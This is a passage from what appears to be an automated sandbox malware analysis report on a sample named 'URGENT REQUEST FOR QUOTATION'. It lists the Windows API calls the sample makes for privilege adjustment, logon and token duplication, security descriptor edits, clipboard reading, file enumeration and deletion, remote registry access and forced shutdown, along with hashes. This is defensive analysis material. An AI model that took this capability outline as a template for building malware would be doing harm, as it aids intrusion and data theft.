                                                                                                                        • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                                                        • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00091286
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000912A8
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000912B9
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000912D1
                                                                                                                      • GetProcessWindowStation.USER32 ref: 000912EA
                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 000912F4
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00091310
                                                                                                                        • Part of subcall function 000910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                                                                                                        • Part of subcall function 000910BF: CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                      • String ID: $default$winsta0
                                                                                                                      • API String ID: 22674027-1027155976
                                                                                                                      • Opcode ID: 409c019549bfd975fb3d1cca8e9110228885c76125401cb273730dba8eb9eef5
                                                                                                                      • Instruction ID: 50745b41ef0dd2252fa9c0297fcc0c35f53a7f3b80dbeeb373ac516b2de4aaa1
                                                                                                                      • Opcode Fuzzy Hash: 409c019549bfd975fb3d1cca8e9110228885c76125401cb273730dba8eb9eef5
                                                                                                                      • Instruction Fuzzy Hash: 3F81BF71A0020AAFEF219FA4DC49FEE7BF9EF08704F144129FA14B61A1C7758954EB60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                                                        • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                                                                                                        • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                                                        • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090BCC
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090C00
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090C17
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00090C51
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090C6D
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090C84
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090C8C
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00090C93
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090CB4
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00090CBB
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090CEA
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090D0C
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090D1E
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D45
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D4C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D55
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D5C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D65
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D6C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00090D78
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D7F
                                                                                                                        • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                                                                                                        • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                                                                                                        • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4175595110-0
                                                                                                                      • Opcode ID: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                                                                                                      • Instruction ID: d5dddb060d4178d8218017bdb3e3afc50268151a0e25116ef7be52758d608945
                                                                                                                      • Opcode Fuzzy Hash: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                                                                                                      • Instruction Fuzzy Hash: 8771697290120AAFEF10DFA5DC48FEEBBBCBF05304F144515F918A6291D775AA05DBA0
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32(000CCC08), ref: 000AEB29
                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 000AEB37
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 000AEB43
                                                                                                                      • CloseClipboard.USER32 ref: 000AEB4F
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEB87
                                                                                                                      • CloseClipboard.USER32 ref: 000AEB91
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AEBBC
                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 000AEBC9
                                                                                                                      • GetClipboardData.USER32(00000001), ref: 000AEBD1
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEBE2
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AEC22
                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 000AEC38
                                                                                                                      • GetClipboardData.USER32(0000000F), ref: 000AEC44
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEC55
                                                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000AEC77
                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AEC94
                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AECD2
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AECF3
                                                                                                                      • CountClipboardFormats.USER32 ref: 000AED14
                                                                                                                      • CloseClipboard.USER32 ref: 000AED59
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420908878-0
                                                                                                                      • Opcode ID: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                                                                                                      • Instruction ID: db709fe28f0427819330a27a2f820508e89708a75e9ea304bed440e5a403af04
                                                                                                                      • Opcode Fuzzy Hash: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                                                                                                      • Instruction Fuzzy Hash: 5D61E034204341AFE311EFA4D888F6AB7E8EF85714F14451DF45A9B2A2CB75DD06CB62
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A69BE
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A6A12
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A4E
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A75
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6AB2
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6ADF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                      • API String ID: 3830820486-3289030164
                                                                                                                      • Opcode ID: 035b69c36dd68b6ba31206ea2c17a6784d1d6c446b048683d648b81e78a53053
                                                                                                                      • Instruction ID: 1010464e94b6e1f5039746b3603dc656ca9ece743af2d672c2268448d7a2c8a7
                                                                                                                      • Opcode Fuzzy Hash: 035b69c36dd68b6ba31206ea2c17a6784d1d6c446b048683d648b81e78a53053
                                                                                                                      • Instruction Fuzzy Hash: 4ED160B2508300AFC315EBA0C885EABB7ECAF89704F44491DF589D7192EB75DA44CB62
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000A9663
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 000A96A1
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 000A96BB
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A96D3
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A96DE
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 000A96FA
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A974A
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A9768
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A9772
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A977F
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A978F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                      • Opcode ID: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                                                                                                      • Instruction ID: eab9dc92875b6523a15c29596f0574120f6c62b34ac064f479ce50f7c4fa97f0
                                                                                                                      • Opcode Fuzzy Hash: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                                                                                                      • Instruction Fuzzy Hash: A131B3326446196AEB14EFF4EC49EEE77EC9F4A321F104155F919E2090DB34DE848F24
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000A97BE
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A9819
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A9824
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 000A9840
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A9890
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A98AE
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A98B8
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A98C5
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A98D5
                                                                                                                        • Part of subcall function 0009DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0009DB00
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                      • Opcode ID: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                                                                                                      • Instruction ID: daad73ee5136a16af65d732cf552373528cc7764132f700469d5b2afd078d132
                                                                                                                      • Opcode Fuzzy Hash: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                                                                                                      • Instruction Fuzzy Hash: 2731B2316406196AEF20EFF4EC48EEE77EC9F47321F144155E914A2191DF39DA85CB60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBF3E
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 000BBFA9
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BBFCD
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000BC02C
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000BC0E7
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000BC154
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000BC1E9
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 000BC23A
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000BC2E3
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000BC382
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BC38F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3102970594-0
                                                                                                                      • Opcode ID: 8b8352d8ddf16f6f3035b64fdf9d63a2e1a1c0812de21c09d9d805b899639c4f
                                                                                                                      • Instruction ID: 320c4839eb9ad941072c581324dbe22f0dc6f7966b921fdb80b0966a849060f5
                                                                                                                      • Opcode Fuzzy Hash: 8b8352d8ddf16f6f3035b64fdf9d63a2e1a1c0812de21c09d9d805b899639c4f
                                                                                                                      • Instruction Fuzzy Hash: 50028F71604200AFD715CF28C895E6ABBE5EF89304F58C4ADF84ADB2A2DB31ED45CB51
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 000A8257
                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 000A8267
                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000A8273
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A8310
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8324
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8356
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A838C
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8395
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                      • Opcode ID: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                                                                                                      • Instruction ID: aadbab18307e877921e5c41c3b5c252d94dc07ad87232ce683931a1a60733ca7
                                                                                                                      • Opcode Fuzzy Hash: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                                                                                                      • Instruction Fuzzy Hash: 31616C725047459FDB10EF60C844EAEB3E8FF89314F04892EF98997252DB35EA45CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009D122
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0009D1DD
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009D1F0
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D20D
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D237
                                                                                                                        • Part of subcall function 0009D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0009D21C,?,?), ref: 0009D2B2
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0009D253
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D264
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                      • Opcode ID: 46b5c60ad78f4526ea64828af8b98788763ca4b6fdc1159b7cbfef0db8963316
                                                                                                                      • Instruction ID: 68a07b9260a803f0d34132b32ec99e1d497784ad96b3b4f0d6bac2e6f6d8aded
                                                                                                                      • Opcode Fuzzy Hash: 46b5c60ad78f4526ea64828af8b98788763ca4b6fdc1159b7cbfef0db8963316
                                                                                                                      • Instruction Fuzzy Hash: FA617C3184510DABDF06EBE0DA92DEDB7B9AF55300F604166E442771A2EF30AF09DB60
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                                                                                                      • Instruction ID: 52fee5a0436d58109a5c7274bc8d4bda53593e9afb5465856b973b1530663c2c
                                                                                                                      • Opcode Fuzzy Hash: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                                                                                                      • Instruction Fuzzy Hash: A541CD35204651AFE720CF55D888F59BBE5FF45329F14C099E45A8BA62C739EC42CB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                                                        • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                                                        • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 0009E932
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                                                      • API String ID: 2234035333-3163812486
                                                                                                                      • Opcode ID: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                                                                                                      • Instruction ID: cc19a8983acc6c6d2992c43a49adc68e1682a102a79cc99b4026ab16e9c5d437
                                                                                                                      • Opcode Fuzzy Hash: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
